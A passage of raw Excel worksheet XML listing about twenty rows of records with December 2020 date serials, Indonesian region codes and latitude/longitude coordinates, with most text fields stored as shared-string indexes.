      <c r="H2516" t="s">
        <v>26</v>
      </c>
      <c r="I2516" t="s">
        <v>137</v>
      </c>
      <c r="J2516" t="s">
        <v>8442</v>
      </c>
      <c r="L2516" t="s">
        <v>7152</v>
      </c>
      <c r="M2516">
        <v>3173030005</v>
      </c>
      <c r="N2516">
        <v>3173030</v>
      </c>
      <c r="O2516">
        <v>3173</v>
      </c>
      <c r="P2516">
        <v>31</v>
      </c>
      <c r="Q2516" t="s">
        <v>3128</v>
      </c>
      <c r="R2516" t="s">
        <v>3128</v>
      </c>
      <c r="S2516" t="s">
        <v>62</v>
      </c>
      <c r="T2516" t="s">
        <v>33</v>
      </c>
      <c r="U2516" s="5">
        <v>10683966</v>
      </c>
      <c r="V2516" s="5" t="s">
        <v>16699</v>
      </c>
      <c r="W2516" s="5">
        <v>-617817</v>
      </c>
      <c r="X2516" t="s">
        <v>20441</v>
      </c>
      <c r="Y2516" t="str">
        <f t="shared" si="39"/>
        <v>-6.17817,106.83966</v>
      </c>
    </row>
    <row r="2517" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2517">
        <v>224399</v>
      </c>
      <c r="B2517" s="1">
        <v>44169</v>
      </c>
      <c r="C2517" s="2">
        <v>0.73734953703703709</v>
      </c>
      <c r="D2517" t="s">
        <v>22</v>
      </c>
      <c r="E2517" t="s">
        <v>23</v>
      </c>
      <c r="F2517" t="s">
        <v>8443</v>
      </c>
      <c r="H2517" t="s">
        <v>26</v>
      </c>
      <c r="I2517" t="s">
        <v>4261</v>
      </c>
      <c r="J2517" t="s">
        <v>6038</v>
      </c>
      <c r="L2517" t="s">
        <v>8444</v>
      </c>
      <c r="M2517">
        <v>1275120001</v>
      </c>
      <c r="N2517">
        <v>1275120</v>
      </c>
      <c r="O2517">
        <v>1275</v>
      </c>
      <c r="P2517">
        <v>12</v>
      </c>
      <c r="Q2517" t="s">
        <v>8445</v>
      </c>
      <c r="R2517" t="s">
        <v>8446</v>
      </c>
      <c r="S2517" t="s">
        <v>7704</v>
      </c>
      <c r="T2517" t="s">
        <v>6043</v>
      </c>
      <c r="U2517" s="5">
        <v>9861955</v>
      </c>
      <c r="V2517" s="5" t="s">
        <v>16700</v>
      </c>
      <c r="W2517" s="5">
        <v>359853</v>
      </c>
      <c r="X2517" t="s">
        <v>20442</v>
      </c>
      <c r="Y2517" t="str">
        <f t="shared" si="39"/>
        <v>3.59853,98.61955</v>
      </c>
    </row>
    <row r="2518" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2518">
        <v>224403</v>
      </c>
      <c r="B2518" s="1">
        <v>44170</v>
      </c>
      <c r="C2518" s="2">
        <v>0.34296296296296297</v>
      </c>
      <c r="D2518" t="s">
        <v>22</v>
      </c>
      <c r="E2518" t="s">
        <v>23</v>
      </c>
      <c r="F2518" t="s">
        <v>8447</v>
      </c>
      <c r="G2518" t="s">
        <v>8448</v>
      </c>
      <c r="H2518" t="s">
        <v>26</v>
      </c>
      <c r="I2518" t="s">
        <v>3042</v>
      </c>
      <c r="J2518" t="s">
        <v>2622</v>
      </c>
      <c r="M2518">
        <v>3578110004</v>
      </c>
      <c r="N2518">
        <v>3578110</v>
      </c>
      <c r="O2518">
        <v>3578</v>
      </c>
      <c r="P2518">
        <v>35</v>
      </c>
      <c r="Q2518" t="s">
        <v>1911</v>
      </c>
      <c r="R2518" t="s">
        <v>1894</v>
      </c>
      <c r="S2518" t="s">
        <v>1346</v>
      </c>
      <c r="T2518" t="s">
        <v>1221</v>
      </c>
      <c r="U2518" s="5">
        <v>11274659</v>
      </c>
      <c r="V2518" s="5" t="s">
        <v>16701</v>
      </c>
      <c r="W2518" s="5">
        <v>-729643</v>
      </c>
      <c r="X2518" t="s">
        <v>20443</v>
      </c>
      <c r="Y2518" t="str">
        <f t="shared" si="39"/>
        <v>-7.29643,112.74659</v>
      </c>
    </row>
    <row r="2519" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2519">
        <v>224404</v>
      </c>
      <c r="B2519" s="1">
        <v>44171</v>
      </c>
      <c r="C2519" s="2">
        <v>0</v>
      </c>
      <c r="D2519" t="s">
        <v>2648</v>
      </c>
      <c r="E2519" t="s">
        <v>23</v>
      </c>
      <c r="G2519" t="s">
        <v>8449</v>
      </c>
      <c r="H2519" t="s">
        <v>26</v>
      </c>
      <c r="J2519" t="s">
        <v>2627</v>
      </c>
      <c r="L2519" t="s">
        <v>8450</v>
      </c>
      <c r="M2519">
        <v>3216100005</v>
      </c>
      <c r="N2519">
        <v>3216100</v>
      </c>
      <c r="O2519">
        <v>3216</v>
      </c>
      <c r="P2519">
        <v>32</v>
      </c>
      <c r="Q2519" t="s">
        <v>8451</v>
      </c>
      <c r="R2519" t="s">
        <v>940</v>
      </c>
      <c r="S2519" t="s">
        <v>41</v>
      </c>
      <c r="T2519" t="s">
        <v>42</v>
      </c>
      <c r="U2519" s="5">
        <v>10697214</v>
      </c>
      <c r="V2519" s="5" t="s">
        <v>16702</v>
      </c>
      <c r="W2519" s="5">
        <v>-610392</v>
      </c>
      <c r="X2519" t="s">
        <v>20444</v>
      </c>
      <c r="Y2519" t="str">
        <f t="shared" si="39"/>
        <v>-6.10392,106.97214</v>
      </c>
    </row>
    <row r="2520" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2520">
        <v>224406</v>
      </c>
      <c r="B2520" s="1">
        <v>44171</v>
      </c>
      <c r="C2520" s="2">
        <v>2.0833333333333333E-3</v>
      </c>
      <c r="D2520" t="s">
        <v>2648</v>
      </c>
      <c r="E2520" t="s">
        <v>23</v>
      </c>
      <c r="G2520" t="s">
        <v>8452</v>
      </c>
      <c r="H2520" t="s">
        <v>26</v>
      </c>
      <c r="J2520" t="s">
        <v>8453</v>
      </c>
      <c r="L2520" t="s">
        <v>8454</v>
      </c>
      <c r="M2520">
        <v>3175060003</v>
      </c>
      <c r="N2520">
        <v>3175060</v>
      </c>
      <c r="O2520">
        <v>3175</v>
      </c>
      <c r="P2520">
        <v>31</v>
      </c>
      <c r="Q2520" t="s">
        <v>4018</v>
      </c>
      <c r="R2520" t="s">
        <v>2279</v>
      </c>
      <c r="S2520" t="s">
        <v>547</v>
      </c>
      <c r="T2520" t="s">
        <v>33</v>
      </c>
      <c r="U2520" s="5">
        <v>10696657</v>
      </c>
      <c r="V2520" s="5" t="s">
        <v>16703</v>
      </c>
      <c r="W2520" s="5">
        <v>-610613</v>
      </c>
      <c r="X2520" t="s">
        <v>20445</v>
      </c>
      <c r="Y2520" t="str">
        <f t="shared" si="39"/>
        <v>-6.10613,106.96657</v>
      </c>
    </row>
    <row r="2521" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2521">
        <v>224471</v>
      </c>
      <c r="B2521" s="1">
        <v>44171</v>
      </c>
      <c r="C2521" s="2">
        <v>0.12986111111111112</v>
      </c>
      <c r="D2521" t="s">
        <v>2648</v>
      </c>
      <c r="E2521" t="s">
        <v>23</v>
      </c>
      <c r="G2521" t="s">
        <v>8455</v>
      </c>
      <c r="H2521" t="s">
        <v>26</v>
      </c>
      <c r="J2521" t="s">
        <v>5962</v>
      </c>
      <c r="L2521" t="s">
        <v>8456</v>
      </c>
      <c r="M2521">
        <v>3175060005</v>
      </c>
      <c r="N2521">
        <v>3175060</v>
      </c>
      <c r="O2521">
        <v>3175</v>
      </c>
      <c r="P2521">
        <v>31</v>
      </c>
      <c r="Q2521" t="s">
        <v>5964</v>
      </c>
      <c r="R2521" t="s">
        <v>2279</v>
      </c>
      <c r="S2521" t="s">
        <v>547</v>
      </c>
      <c r="T2521" t="s">
        <v>33</v>
      </c>
      <c r="U2521" s="5">
        <v>10693825</v>
      </c>
      <c r="V2521" s="5" t="s">
        <v>16704</v>
      </c>
      <c r="W2521" s="5">
        <v>-613304</v>
      </c>
      <c r="X2521" t="s">
        <v>20446</v>
      </c>
      <c r="Y2521" t="str">
        <f t="shared" si="39"/>
        <v>-6.13304,106.93825</v>
      </c>
    </row>
    <row r="2522" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2522">
        <v>224479</v>
      </c>
      <c r="B2522" s="1">
        <v>44171</v>
      </c>
      <c r="C2522" s="2">
        <v>0.15934027777777779</v>
      </c>
      <c r="D2522" t="s">
        <v>22</v>
      </c>
      <c r="E2522" t="s">
        <v>23</v>
      </c>
      <c r="F2522" t="s">
        <v>8457</v>
      </c>
      <c r="G2522" t="s">
        <v>8458</v>
      </c>
      <c r="H2522" t="s">
        <v>7978</v>
      </c>
      <c r="I2522" t="s">
        <v>8459</v>
      </c>
      <c r="J2522" t="s">
        <v>2627</v>
      </c>
      <c r="L2522" t="s">
        <v>8460</v>
      </c>
      <c r="M2522">
        <v>3272010009</v>
      </c>
      <c r="N2522">
        <v>3272010</v>
      </c>
      <c r="O2522">
        <v>3272</v>
      </c>
      <c r="P2522">
        <v>32</v>
      </c>
      <c r="Q2522" t="s">
        <v>8461</v>
      </c>
      <c r="R2522" t="s">
        <v>8461</v>
      </c>
      <c r="S2522" t="s">
        <v>7762</v>
      </c>
      <c r="T2522" t="s">
        <v>42</v>
      </c>
      <c r="U2522" s="5">
        <v>10694033</v>
      </c>
      <c r="V2522" s="5" t="s">
        <v>16705</v>
      </c>
      <c r="W2522" s="5">
        <v>-696195</v>
      </c>
      <c r="X2522" t="s">
        <v>20447</v>
      </c>
      <c r="Y2522" t="str">
        <f t="shared" si="39"/>
        <v>-6.96195,106.94033</v>
      </c>
    </row>
    <row r="2523" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2523">
        <v>224482</v>
      </c>
      <c r="B2523" s="1">
        <v>44171</v>
      </c>
      <c r="C2523" s="2">
        <v>0.16217592592592592</v>
      </c>
      <c r="D2523" t="s">
        <v>22</v>
      </c>
      <c r="E2523" t="s">
        <v>23</v>
      </c>
      <c r="F2523" t="s">
        <v>8462</v>
      </c>
      <c r="G2523" t="s">
        <v>8463</v>
      </c>
      <c r="H2523" t="s">
        <v>7978</v>
      </c>
      <c r="I2523" t="s">
        <v>8459</v>
      </c>
      <c r="J2523" t="s">
        <v>2627</v>
      </c>
      <c r="L2523" t="s">
        <v>8464</v>
      </c>
      <c r="M2523">
        <v>3202150009</v>
      </c>
      <c r="N2523">
        <v>3202150</v>
      </c>
      <c r="O2523">
        <v>3202</v>
      </c>
      <c r="P2523">
        <v>32</v>
      </c>
      <c r="Q2523" t="s">
        <v>8465</v>
      </c>
      <c r="R2523" t="s">
        <v>8466</v>
      </c>
      <c r="S2523" t="s">
        <v>7762</v>
      </c>
      <c r="T2523" t="s">
        <v>42</v>
      </c>
      <c r="U2523" s="5">
        <v>10694306</v>
      </c>
      <c r="V2523" s="5" t="s">
        <v>16706</v>
      </c>
      <c r="W2523" s="5">
        <v>-696891</v>
      </c>
      <c r="X2523" t="s">
        <v>20448</v>
      </c>
      <c r="Y2523" t="str">
        <f t="shared" si="39"/>
        <v>-6.96891,106.94306</v>
      </c>
    </row>
    <row r="2524" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2524">
        <v>224487</v>
      </c>
      <c r="B2524" s="1">
        <v>44171</v>
      </c>
      <c r="C2524" s="2">
        <v>0.20541666666666666</v>
      </c>
      <c r="D2524" t="s">
        <v>22</v>
      </c>
      <c r="E2524" t="s">
        <v>23</v>
      </c>
      <c r="F2524" t="s">
        <v>8467</v>
      </c>
      <c r="G2524" t="s">
        <v>8468</v>
      </c>
      <c r="H2524" t="s">
        <v>26</v>
      </c>
      <c r="I2524" t="s">
        <v>1891</v>
      </c>
      <c r="J2524" t="s">
        <v>2627</v>
      </c>
      <c r="L2524" t="s">
        <v>8469</v>
      </c>
      <c r="M2524">
        <v>3212160013</v>
      </c>
      <c r="N2524">
        <v>3212160</v>
      </c>
      <c r="O2524">
        <v>3212</v>
      </c>
      <c r="P2524">
        <v>32</v>
      </c>
      <c r="Q2524" t="s">
        <v>8470</v>
      </c>
      <c r="R2524" t="s">
        <v>8470</v>
      </c>
      <c r="S2524" t="s">
        <v>8471</v>
      </c>
      <c r="T2524" t="s">
        <v>42</v>
      </c>
      <c r="U2524" s="5">
        <v>10832062</v>
      </c>
      <c r="V2524" s="5" t="s">
        <v>16707</v>
      </c>
      <c r="W2524" s="5">
        <v>-632879</v>
      </c>
      <c r="X2524" t="s">
        <v>20449</v>
      </c>
      <c r="Y2524" t="str">
        <f t="shared" si="39"/>
        <v>-6.32879,108.32062</v>
      </c>
    </row>
    <row r="2525" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2525">
        <v>224488</v>
      </c>
      <c r="B2525" s="1">
        <v>44171</v>
      </c>
      <c r="C2525" s="2">
        <v>0.43585648148148143</v>
      </c>
      <c r="D2525" t="s">
        <v>22</v>
      </c>
      <c r="E2525" t="s">
        <v>23</v>
      </c>
      <c r="F2525" t="s">
        <v>8472</v>
      </c>
      <c r="G2525" t="s">
        <v>8473</v>
      </c>
      <c r="H2525" t="s">
        <v>26</v>
      </c>
      <c r="I2525" t="s">
        <v>3668</v>
      </c>
      <c r="J2525" t="s">
        <v>6940</v>
      </c>
      <c r="L2525" t="s">
        <v>8474</v>
      </c>
      <c r="M2525">
        <v>1174021008</v>
      </c>
      <c r="N2525">
        <v>1174021</v>
      </c>
      <c r="O2525">
        <v>1174</v>
      </c>
      <c r="P2525">
        <v>11</v>
      </c>
      <c r="Q2525" t="s">
        <v>8475</v>
      </c>
      <c r="R2525" t="s">
        <v>8476</v>
      </c>
      <c r="S2525" t="s">
        <v>8477</v>
      </c>
      <c r="T2525" t="s">
        <v>6945</v>
      </c>
      <c r="U2525" s="5">
        <v>9707772</v>
      </c>
      <c r="V2525" s="5" t="s">
        <v>16708</v>
      </c>
      <c r="W2525" s="5">
        <v>520418</v>
      </c>
      <c r="X2525" t="s">
        <v>20450</v>
      </c>
      <c r="Y2525" t="str">
        <f t="shared" si="39"/>
        <v>5.20418,97.07772</v>
      </c>
    </row>
    <row r="2526" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2526">
        <v>224489</v>
      </c>
      <c r="B2526" s="1">
        <v>44171</v>
      </c>
      <c r="C2526" s="2">
        <v>0.57503472222222218</v>
      </c>
      <c r="D2526" t="s">
        <v>22</v>
      </c>
      <c r="E2526" t="s">
        <v>23</v>
      </c>
      <c r="F2526" t="s">
        <v>8478</v>
      </c>
      <c r="H2526" t="s">
        <v>26</v>
      </c>
      <c r="I2526" t="s">
        <v>197</v>
      </c>
      <c r="J2526" t="s">
        <v>6940</v>
      </c>
      <c r="L2526" t="s">
        <v>8479</v>
      </c>
      <c r="M2526">
        <v>1111110042</v>
      </c>
      <c r="N2526">
        <v>1111110</v>
      </c>
      <c r="O2526">
        <v>1111</v>
      </c>
      <c r="P2526">
        <v>11</v>
      </c>
      <c r="Q2526" t="s">
        <v>8480</v>
      </c>
      <c r="R2526" t="s">
        <v>8481</v>
      </c>
      <c r="S2526" t="s">
        <v>7392</v>
      </c>
      <c r="T2526" t="s">
        <v>6945</v>
      </c>
      <c r="U2526" s="5">
        <v>9732354</v>
      </c>
      <c r="V2526" s="5" t="s">
        <v>16709</v>
      </c>
      <c r="W2526" s="5">
        <v>504130</v>
      </c>
      <c r="X2526" t="s">
        <v>20451</v>
      </c>
      <c r="Y2526" t="str">
        <f t="shared" si="39"/>
        <v>5.04130,97.32354</v>
      </c>
    </row>
    <row r="2527" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2527">
        <v>224490</v>
      </c>
      <c r="B2527" s="1">
        <v>44171</v>
      </c>
      <c r="C2527" s="2">
        <v>0.70298611111111109</v>
      </c>
      <c r="D2527" t="s">
        <v>22</v>
      </c>
      <c r="E2527" t="s">
        <v>23</v>
      </c>
      <c r="F2527" t="s">
        <v>8482</v>
      </c>
      <c r="H2527" t="s">
        <v>26</v>
      </c>
      <c r="I2527" t="s">
        <v>2196</v>
      </c>
      <c r="J2527" t="s">
        <v>6509</v>
      </c>
      <c r="L2527" t="s">
        <v>8483</v>
      </c>
      <c r="M2527">
        <v>6301030006</v>
      </c>
      <c r="N2527">
        <v>6301030</v>
      </c>
      <c r="O2527">
        <v>6301</v>
      </c>
      <c r="P2527">
        <v>63</v>
      </c>
      <c r="Q2527" t="s">
        <v>8484</v>
      </c>
      <c r="R2527" t="s">
        <v>8485</v>
      </c>
      <c r="S2527" t="s">
        <v>7537</v>
      </c>
      <c r="T2527" t="s">
        <v>6513</v>
      </c>
      <c r="U2527" s="5">
        <v>11461857</v>
      </c>
      <c r="V2527" s="5" t="s">
        <v>16710</v>
      </c>
      <c r="W2527" s="5">
        <v>-359200</v>
      </c>
      <c r="X2527" t="s">
        <v>20452</v>
      </c>
      <c r="Y2527" t="str">
        <f t="shared" si="39"/>
        <v>-3.59200,114.61857</v>
      </c>
    </row>
    <row r="2528" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2528">
        <v>224491</v>
      </c>
      <c r="B2528" s="1">
        <v>44171</v>
      </c>
      <c r="C2528" s="2">
        <v>0.90625</v>
      </c>
      <c r="D2528" t="s">
        <v>2648</v>
      </c>
      <c r="E2528" t="s">
        <v>23</v>
      </c>
      <c r="G2528" t="s">
        <v>8486</v>
      </c>
      <c r="H2528" t="s">
        <v>26</v>
      </c>
      <c r="J2528" t="s">
        <v>1022</v>
      </c>
      <c r="L2528" t="s">
        <v>8487</v>
      </c>
      <c r="M2528">
        <v>3172060002</v>
      </c>
      <c r="N2528">
        <v>3172060</v>
      </c>
      <c r="O2528">
        <v>3172</v>
      </c>
      <c r="P2528">
        <v>31</v>
      </c>
      <c r="Q2528" t="s">
        <v>1025</v>
      </c>
      <c r="R2528" t="s">
        <v>48</v>
      </c>
      <c r="S2528" t="s">
        <v>49</v>
      </c>
      <c r="T2528" t="s">
        <v>33</v>
      </c>
      <c r="U2528" s="5">
        <v>10687299</v>
      </c>
      <c r="V2528" s="5" t="s">
        <v>16711</v>
      </c>
      <c r="W2528" s="5">
        <v>-624368</v>
      </c>
      <c r="X2528" t="s">
        <v>20453</v>
      </c>
      <c r="Y2528" t="str">
        <f t="shared" si="39"/>
        <v>-6.24368,106.87299</v>
      </c>
    </row>
    <row r="2529" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2529">
        <v>224503</v>
      </c>
      <c r="B2529" s="1">
        <v>44171</v>
      </c>
      <c r="C2529" s="2">
        <v>0.94817129629629626</v>
      </c>
      <c r="D2529" t="s">
        <v>22</v>
      </c>
      <c r="E2529" t="s">
        <v>23</v>
      </c>
      <c r="F2529" t="s">
        <v>8488</v>
      </c>
      <c r="H2529" t="s">
        <v>26</v>
      </c>
      <c r="I2529" t="s">
        <v>166</v>
      </c>
      <c r="J2529" t="s">
        <v>8489</v>
      </c>
      <c r="L2529" t="s">
        <v>8490</v>
      </c>
      <c r="M2529">
        <v>3374080010</v>
      </c>
      <c r="N2529">
        <v>3374080</v>
      </c>
      <c r="O2529">
        <v>3374</v>
      </c>
      <c r="P2529">
        <v>33</v>
      </c>
      <c r="Q2529" t="s">
        <v>8491</v>
      </c>
      <c r="R2529" t="s">
        <v>2992</v>
      </c>
      <c r="S2529" t="s">
        <v>1334</v>
      </c>
      <c r="T2529" t="s">
        <v>1134</v>
      </c>
      <c r="U2529" s="5">
        <v>11046263</v>
      </c>
      <c r="V2529" s="5" t="s">
        <v>16712</v>
      </c>
      <c r="W2529" s="5">
        <v>-699007</v>
      </c>
      <c r="X2529" t="s">
        <v>20454</v>
      </c>
      <c r="Y2529" t="str">
        <f t="shared" si="39"/>
        <v>-6.99007,110.46263</v>
      </c>
    </row>
    <row r="2530" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2530">
        <v>224533</v>
      </c>
      <c r="B2530" s="1">
        <v>44172</v>
      </c>
      <c r="C2530" s="2">
        <v>0.16841435185185186</v>
      </c>
      <c r="D2530" t="s">
        <v>22</v>
      </c>
      <c r="E2530" t="s">
        <v>23</v>
      </c>
      <c r="F2530" t="s">
        <v>8492</v>
      </c>
      <c r="G2530" t="s">
        <v>8493</v>
      </c>
      <c r="H2530" t="s">
        <v>26</v>
      </c>
      <c r="I2530" t="s">
        <v>8338</v>
      </c>
      <c r="J2530" t="s">
        <v>6940</v>
      </c>
      <c r="L2530" t="s">
        <v>8494</v>
      </c>
      <c r="M2530">
        <v>1105130079</v>
      </c>
      <c r="N2530">
        <v>1105130</v>
      </c>
      <c r="O2530">
        <v>1105</v>
      </c>
      <c r="P2530">
        <v>11</v>
      </c>
      <c r="Q2530" t="s">
        <v>8495</v>
      </c>
      <c r="R2530" t="s">
        <v>8496</v>
      </c>
      <c r="S2530" t="s">
        <v>8497</v>
      </c>
      <c r="T2530" t="s">
        <v>6945</v>
      </c>
      <c r="U2530" s="5">
        <v>9776817</v>
      </c>
      <c r="V2530" s="5" t="s">
        <v>16713</v>
      </c>
      <c r="W2530" s="5">
        <v>494919</v>
      </c>
      <c r="X2530" t="s">
        <v>20455</v>
      </c>
      <c r="Y2530" t="str">
        <f t="shared" si="39"/>
        <v>4.94919,97.76817</v>
      </c>
    </row>
    <row r="2531" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2531">
        <v>224534</v>
      </c>
      <c r="B2531" s="1">
        <v>44172</v>
      </c>
      <c r="C2531" s="2">
        <v>0.22785879629629632</v>
      </c>
      <c r="D2531" t="s">
        <v>22</v>
      </c>
      <c r="E2531" t="s">
        <v>23</v>
      </c>
      <c r="F2531" t="s">
        <v>8498</v>
      </c>
      <c r="G2531" t="s">
        <v>8499</v>
      </c>
      <c r="H2531" t="s">
        <v>26</v>
      </c>
      <c r="I2531" t="s">
        <v>2073</v>
      </c>
      <c r="J2531" t="s">
        <v>6940</v>
      </c>
      <c r="L2531" t="s">
        <v>8500</v>
      </c>
      <c r="M2531">
        <v>1111101006</v>
      </c>
      <c r="N2531">
        <v>1111101</v>
      </c>
      <c r="O2531">
        <v>1111</v>
      </c>
      <c r="P2531">
        <v>11</v>
      </c>
      <c r="Q2531" t="s">
        <v>8501</v>
      </c>
      <c r="R2531" t="s">
        <v>8502</v>
      </c>
      <c r="S2531" t="s">
        <v>7392</v>
      </c>
      <c r="T2531" t="s">
        <v>6945</v>
      </c>
      <c r="U2531" s="5">
        <v>9735050</v>
      </c>
      <c r="V2531" s="5" t="s">
        <v>16714</v>
      </c>
      <c r="W2531" s="5">
        <v>509654</v>
      </c>
      <c r="X2531" t="s">
        <v>20456</v>
      </c>
      <c r="Y2531" t="str">
        <f t="shared" si="39"/>
        <v>5.09654,97.35050</v>
      </c>
    </row>
    <row r="2532" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2532">
        <v>224535</v>
      </c>
      <c r="B2532" s="1">
        <v>44172</v>
      </c>
      <c r="C2532" s="2">
        <v>0.7176851851851852</v>
      </c>
      <c r="D2532" t="s">
        <v>22</v>
      </c>
      <c r="E2532" t="s">
        <v>23</v>
      </c>
      <c r="F2532" t="s">
        <v>8503</v>
      </c>
      <c r="H2532" t="s">
        <v>26</v>
      </c>
      <c r="I2532" t="s">
        <v>137</v>
      </c>
      <c r="J2532" t="s">
        <v>2627</v>
      </c>
      <c r="L2532" t="s">
        <v>8504</v>
      </c>
      <c r="M2532">
        <v>3201240017</v>
      </c>
      <c r="N2532">
        <v>3201240</v>
      </c>
      <c r="O2532">
        <v>3201</v>
      </c>
      <c r="P2532">
        <v>32</v>
      </c>
      <c r="Q2532" t="s">
        <v>8505</v>
      </c>
      <c r="R2532" t="s">
        <v>8506</v>
      </c>
      <c r="S2532" t="s">
        <v>421</v>
      </c>
      <c r="T2532" t="s">
        <v>42</v>
      </c>
      <c r="U2532" s="5">
        <v>10669183</v>
      </c>
      <c r="V2532" s="5" t="s">
        <v>16715</v>
      </c>
      <c r="W2532" s="5">
        <v>-642891</v>
      </c>
      <c r="X2532" t="s">
        <v>20457</v>
      </c>
      <c r="Y2532" t="str">
        <f t="shared" si="39"/>
        <v>-6.42891,106.69183</v>
      </c>
    </row>
    <row r="2533" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2533">
        <v>224536</v>
      </c>
      <c r="B2533" s="1">
        <v>44173</v>
      </c>
      <c r="C2533" s="2">
        <v>0.45490740740740737</v>
      </c>
      <c r="D2533" t="s">
        <v>22</v>
      </c>
      <c r="E2533" t="s">
        <v>23</v>
      </c>
      <c r="F2533" t="s">
        <v>8507</v>
      </c>
      <c r="G2533" t="s">
        <v>8508</v>
      </c>
      <c r="H2533" t="s">
        <v>7978</v>
      </c>
      <c r="I2533" t="s">
        <v>7983</v>
      </c>
      <c r="J2533" t="s">
        <v>2627</v>
      </c>
      <c r="L2533" t="s">
        <v>8509</v>
      </c>
      <c r="M2533">
        <v>3203190007</v>
      </c>
      <c r="N2533">
        <v>3203190</v>
      </c>
      <c r="O2533">
        <v>3203</v>
      </c>
      <c r="P2533">
        <v>32</v>
      </c>
      <c r="Q2533" t="s">
        <v>8510</v>
      </c>
      <c r="R2533" t="s">
        <v>8511</v>
      </c>
      <c r="S2533" t="s">
        <v>8512</v>
      </c>
      <c r="T2533" t="s">
        <v>42</v>
      </c>
      <c r="U2533" s="5">
        <v>10716612</v>
      </c>
      <c r="V2533" s="5" t="s">
        <v>16716</v>
      </c>
      <c r="W2533" s="5">
        <v>-680182</v>
      </c>
      <c r="X2533" t="s">
        <v>20458</v>
      </c>
      <c r="Y2533" t="str">
        <f t="shared" si="39"/>
        <v>-6.80182,107.16612</v>
      </c>
    </row>
    <row r="2534" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2534">
        <v>224538</v>
      </c>
      <c r="B2534" s="1">
        <v>44174</v>
      </c>
      <c r="C2534" s="2">
        <v>0.13819444444444443</v>
      </c>
      <c r="D2534" t="s">
        <v>2648</v>
      </c>
      <c r="E2534" t="s">
        <v>23</v>
      </c>
      <c r="G2534" t="s">
        <v>8513</v>
      </c>
      <c r="H2534" t="s">
        <v>26</v>
      </c>
      <c r="J2534" t="s">
        <v>6516</v>
      </c>
      <c r="L2534" t="s">
        <v>8514</v>
      </c>
      <c r="M2534">
        <v>3172060001</v>
      </c>
      <c r="N2534">
        <v>3172060</v>
      </c>
      <c r="O2534">
        <v>3172</v>
      </c>
      <c r="P2534">
        <v>31</v>
      </c>
      <c r="Q2534" t="s">
        <v>309</v>
      </c>
      <c r="R2534" t="s">
        <v>48</v>
      </c>
      <c r="S2534" t="s">
        <v>49</v>
      </c>
      <c r="T2534" t="s">
        <v>33</v>
      </c>
      <c r="U2534" s="5">
        <v>10686991</v>
      </c>
      <c r="V2534" s="5" t="s">
        <v>16717</v>
      </c>
      <c r="W2534" s="5">
        <v>-622916</v>
      </c>
      <c r="X2534" t="s">
        <v>20459</v>
      </c>
      <c r="Y2534" t="str">
        <f t="shared" si="39"/>
        <v>-6.22916,106.86991</v>
      </c>
    </row>
    <row r="2535" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2535">
        <v>224552</v>
      </c>
      <c r="B2535" s="1">
        <v>44174</v>
      </c>
      <c r="C2535" s="2">
        <v>0.49356481481481485</v>
      </c>
      <c r="D2535" t="s">
        <v>22</v>
      </c>
      <c r="E2535" t="s">
        <v>23</v>
      </c>
      <c r="F2535" t="s">
        <v>8515</v>
      </c>
      <c r="G2535" t="s">
        <v>8516</v>
      </c>
      <c r="H2535" t="s">
        <v>26</v>
      </c>
      <c r="I2535" t="s">
        <v>1055</v>
      </c>
      <c r="J2535" t="s">
        <v>2622</v>
      </c>
      <c r="M2535">
        <v>3527070014</v>
      </c>
      <c r="N2535">
        <v>3527070</v>
      </c>
      <c r="O2535">
        <v>3527</v>
      </c>
      <c r="P2535">
        <v>35</v>
      </c>
      <c r="Q2535" t="s">
        <v>8517</v>
      </c>
      <c r="R2535" t="s">
        <v>8518</v>
      </c>
      <c r="S2535" t="s">
        <v>8519</v>
      </c>
      <c r="T2535" t="s">
        <v>1221</v>
      </c>
      <c r="U2535" s="5">
        <v>11311442</v>
      </c>
      <c r="V2535" s="5" t="s">
        <v>16718</v>
      </c>
      <c r="W2535" s="5">
        <v>-711774</v>
      </c>
      <c r="X2535" t="s">
        <v>20460</v>
      </c>
      <c r="Y2535" t="str">
        <f t="shared" si="39"/>
        <v>-7.11774,113.11442</v>
      </c>
    </row>
    <row r="2536" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2536">
        <v>224553</v>
      </c>
      <c r="B2536" s="1">
        <v>44175</v>
      </c>
      <c r="C2536" s="2">
        <v>0.44324074074074077</v>
      </c>
      <c r="D2536" t="s">
        <v>22</v>
      </c>
      <c r="E2536" t="s">
        <v>23</v>
      </c>
      <c r="F2536" s="3" t="s">
        <v>8520</v>
      </c>
      <c r="G2536" t="s">
        <v>8521</v>
      </c>
      <c r="H2536" t="s">
        <v>26</v>
      </c>
      <c r="I2536" t="s">
        <v>666</v>
      </c>
      <c r="J2536" t="s">
        <v>2622</v>
      </c>
      <c r="M2536">
        <v>3527030009</v>
      </c>
      <c r="N2536">
        <v>3527030</v>
      </c>
      <c r="O2536">
        <v>3527</v>
      </c>
      <c r="P2536">
        <v>35</v>
      </c>
      <c r="Q2536" t="s">
        <v>8522</v>
      </c>
      <c r="R2536" t="s">
        <v>8519</v>
      </c>
      <c r="S2536" t="s">
        <v>8519</v>
      </c>
      <c r="T2536" t="s">
        <v>1221</v>
      </c>
      <c r="U2536" s="5">
        <v>11325112</v>
      </c>
      <c r="V2536" s="5" t="s">
        <v>16719</v>
      </c>
      <c r="W2536" s="5">
        <v>-719271</v>
      </c>
      <c r="X2536" t="s">
        <v>20461</v>
      </c>
      <c r="Y2536" t="str">
        <f t="shared" si="39"/>
        <v>-7.19271,113.25112</v>
      </c>
    </row>
    <row r="2537" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2537">
        <v>224554</v>
      </c>
      <c r="B2537" s="1">
        <v>44175</v>
